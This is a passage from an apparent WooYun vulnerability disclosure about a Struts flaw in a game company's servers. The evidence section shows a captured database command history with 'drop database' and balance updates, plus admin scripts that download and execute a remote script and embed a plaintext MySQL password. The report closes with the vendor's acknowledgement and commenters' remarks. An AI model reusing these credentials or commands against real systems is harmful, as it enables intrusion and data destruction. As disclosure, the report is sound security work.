select\040*\040from\040player\040where\040yx\040=\040'yaowan'\040limit\0405;
\134q
\040show\040databases;\040
drop\040database\040neice_mix_86;
\134]q
\134q
\040show\040databases;\040
use\040neice_mix_80;
select\040*\040from\040server_date;
select\040*\040from\040server_data;
update\040server_data\040set\040s_value\040=\040s_value\040+\040188775\040where\040id\040=\0402;
update\040server_data\040set\040s_value\040=\040s_value\040+\04091895\040where\040id\040=\0403;
select\040*\040from\040server_data;
\134q
\040show\040databases;
drop\040database\040neice_178_15;
\134q
show\040databases;
use\040neice_zl13
\040\134.\040\040huangbaowu.sql
\134q
show\040databases;
use\040neice_duowan58;
select\040*\040From\040user_map;
use\040neice_mix_80;
select\040*\040From\040user_map;
drop\040database\040neice_mix_80
;
create\040database\040neice_mix_80
;
\134q
show\040databases;
\134q
show\040databases;
show\040databases;
use\040astd_178_13;
delete\040from\040mail\040where\040title="\M-e\M-:\M^F\M-f\M^T\M-9\M-g\M^I\M^H\M-o\M-<\M^L\M-g\M-%\M--\M-g\M-%\M^@\M-f\M-4\M-;\M-e\M^J\M-(\M-e\M-%\M^V\M-e\M^J\M-1\M-g\M^B\M-9\M-e\M^H\M-8"\040and\040send_time>"2013-06-27\04017:00:00";
\134q
cat updata_mail.sh
cat: updata_mail.sh: No such file or directory
ls
178_13_0609
178_13.log
178_13_ticket.flag
astd_178_13_20130531
astd_duowan_58_20130531
astd-listener.jar
astd_patch_astd_7-9-0-3_20130628.tar.gz
astd_peiyou_64_20130531
astd_peiyou_64.tgz
astd_update_7-9-0_global.sh
astd_update_7-9-0.sh
astd_yaowan_253_20130531
astd_zhulang_13_20130531
dbbak
dowload.sh
duowan_58_0609
duowan_58.log
duowan_58_ticket.flag
kfz_tools
log_conf.template8
make_tgz.sh
peiyou_64_0609
peiyou_64.log
set_event.sh
tj.sh
tools
update_0704.sql
update_mail.sh
update_ticket.sh
yaowan_253_0609
yaowan_253.log
yaowan_253_ticket.flag
zhulang_13_0609
zhulang_13.log
zhulang_13_ticket.flag
cat update_mail.sh
#!/bin/bash
DATE=`date +%Y%m%d`
if [ -f /home/astd/$1_mail.flag ];then
echo "$1 have insert mail"
else
PATH_dir=/app/astd_$1/logs/Game/DayReport
if [ -d $PATH_dir ];then
ps x |grep -w astd_$1|grep -v grep &>/dev/null
if [ $? -eq 0 ];then
rm /app/astd_$1/logs/Game/DayReport/*sh
rm /app/astd_$1/logs/Game/DayReport/*sql
rm /app/astd_$1/logs/Game/DayReport/*txt
wget -q -P $PATH_dir http://10.6.20.241/astd/patch/jisi_mail/jisi_mail_$DATE.sh
dbname=astd_$1
if [ -s $PATH_dir/jisi_mail_$DATE.sh ];then
cd $PATH_dir
sh jisi_mail_$DATE.sh
if [ -s $PATH_dir/mail.sql -a $? == 0 ];then
/usr/local/mysql/bin/mysql -uastd -p9BdcPAH4w -D$dbname <$PATH_dir/mail.sql
if [ $? == 0 ];then
echo "update $dbname SUCC"
touch /home/astd/$1_mail.flag
fi
fi
fi
else
echo "$1 is not exist"
exit 0
fi
else
echo "$1 is not main"
exit 0
fi
fi
cat update_ticket.sh
#!/bin/bash
if [ -f /home/astd/$1_ticket.flag ];then
echo "$1 have insert mail"
else
PATH_dir=/app/astd_$1/logs/Game/DayReport
if [ -d $PATH_dir ];then
ps x |grep -w astd_$1|grep -v grep &>/dev/null
if [ $? -eq 0 ];then
rm /app/astd_$1/logs/Game/DayReport/*sh
rm /app/astd_$1/logs/Game/DayReport/*sql
rm /app/astd_$1/logs/Game/DayReport/*txt
wget -q -P $PATH_dir http://10.6.20.241/astd/temp/jisi_20130628.sh
dbname=astd_$1
if [ -s $PATH_dir/jisi_20130628.sh ];then
cd $PATH_dir
sh jisi_20130628.sh
if [ -s $PATH_dir/mail.sql -a $? == 0 ];then
/usr/local/mysql/bin/mysql -uastd -p9BdcPAH4w -D$dbname <$PATH_dir/mail.sql
/usr/local/mysql/bin/mysql -uastd -p9BdcPAH4w -D$dbname <$PATH_dir/ticket.sql
if [ $? == 0 ];then
echo "update $dbname SUCC"
touch /home/astd/$1_ticket.flag
fi
fi
fi
else
echo "$1 is not exist"
exit 0
fi
else
echo "$1 is not main"
exit 0
fi
fi

修复方案:

升级最新的Struts。

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-07-15 15:55

厂商回复:

谢谢猪猪侠!

最新状态:

暂无


漏洞评价:

评论

  1. 2013-07-15 11:29 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    求dota的远程代码执行

  2. 2013-07-15 11:34 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    碉堡了!这是重金属的节奏。

  3. 2013-07-15 11:47 | qiaoy ( 普通白帽子 | Rank:110 漏洞数:16 )

    .

  4. 2013-07-15 12:04 | 齐迹 ( 核心白帽子 | Rank:784 漏洞数:100 | 一名普通的phper开发者,关注web安全。)

    导致第三方框架存在的漏洞这句话怎么理解?

  5. 2013-07-15 12:13 | 摄影会长 ( 实习白帽子 | Rank:81 漏洞数:14 | 我是马甲!)

    @齐迹 @xsser struts2 2011煤老板忽悠你

  6. 2013-07-15 12:14 | 摄影会长 ( 实习白帽子 | Rank:81 漏洞数:14 | 我是马甲!)

    @xsser 还不快去找个女朋友 ,还dota..

  7. 2013-07-15 12:25 | 熊猫 ( 实习白帽子 | Rank:64 漏洞数:33 | panda)

    留名

  8. 2013-07-15 14:08 | x-star ( 普通白帽子 | Rank:124 漏洞数:13 | Windows/Linux Kernel. Information Secur...)

    @xsser @猪猪侠 侧漏了啊 不打个码吗?

  9. 2013-07-15 14:27 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    @熊猫 必须刘明

  10. 2013-07-15 22:23 | 多多关照 ( 普通白帽子 | Rank:271 漏洞数:23 | 大牛们,多多关照!)

    大牛这是出山的前奏

  11. 2013-07-16 09:44 | 傲世堂(乌云厂商)

    既然2天被爆了5个漏洞,那就在这招一下系统安全工程师,有意者请与我联系

  12. 2013-07-16 14:49 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @傲世堂 哈,来乌云招人是不错的

  13. 2013-07-19 10:27 | 多多关照 ( 普通白帽子 | Rank:271 漏洞数:23 | 大牛们,多多关照!)

    @傲世堂 乌云有招聘页, http://www.wooyun.org/job.php?action=list

  14. 2013-07-23 17:06 | 傲世堂(乌云厂商)

    @多多关照 谢谢哦 已经发邮件给官方了

  15. 2013-08-14 19:30 | oldsun ( 路人 | Rank:16 漏洞数:4 | 啪啪啪啪啪啪啪啪啪啪啪啪)

    这得给5万rank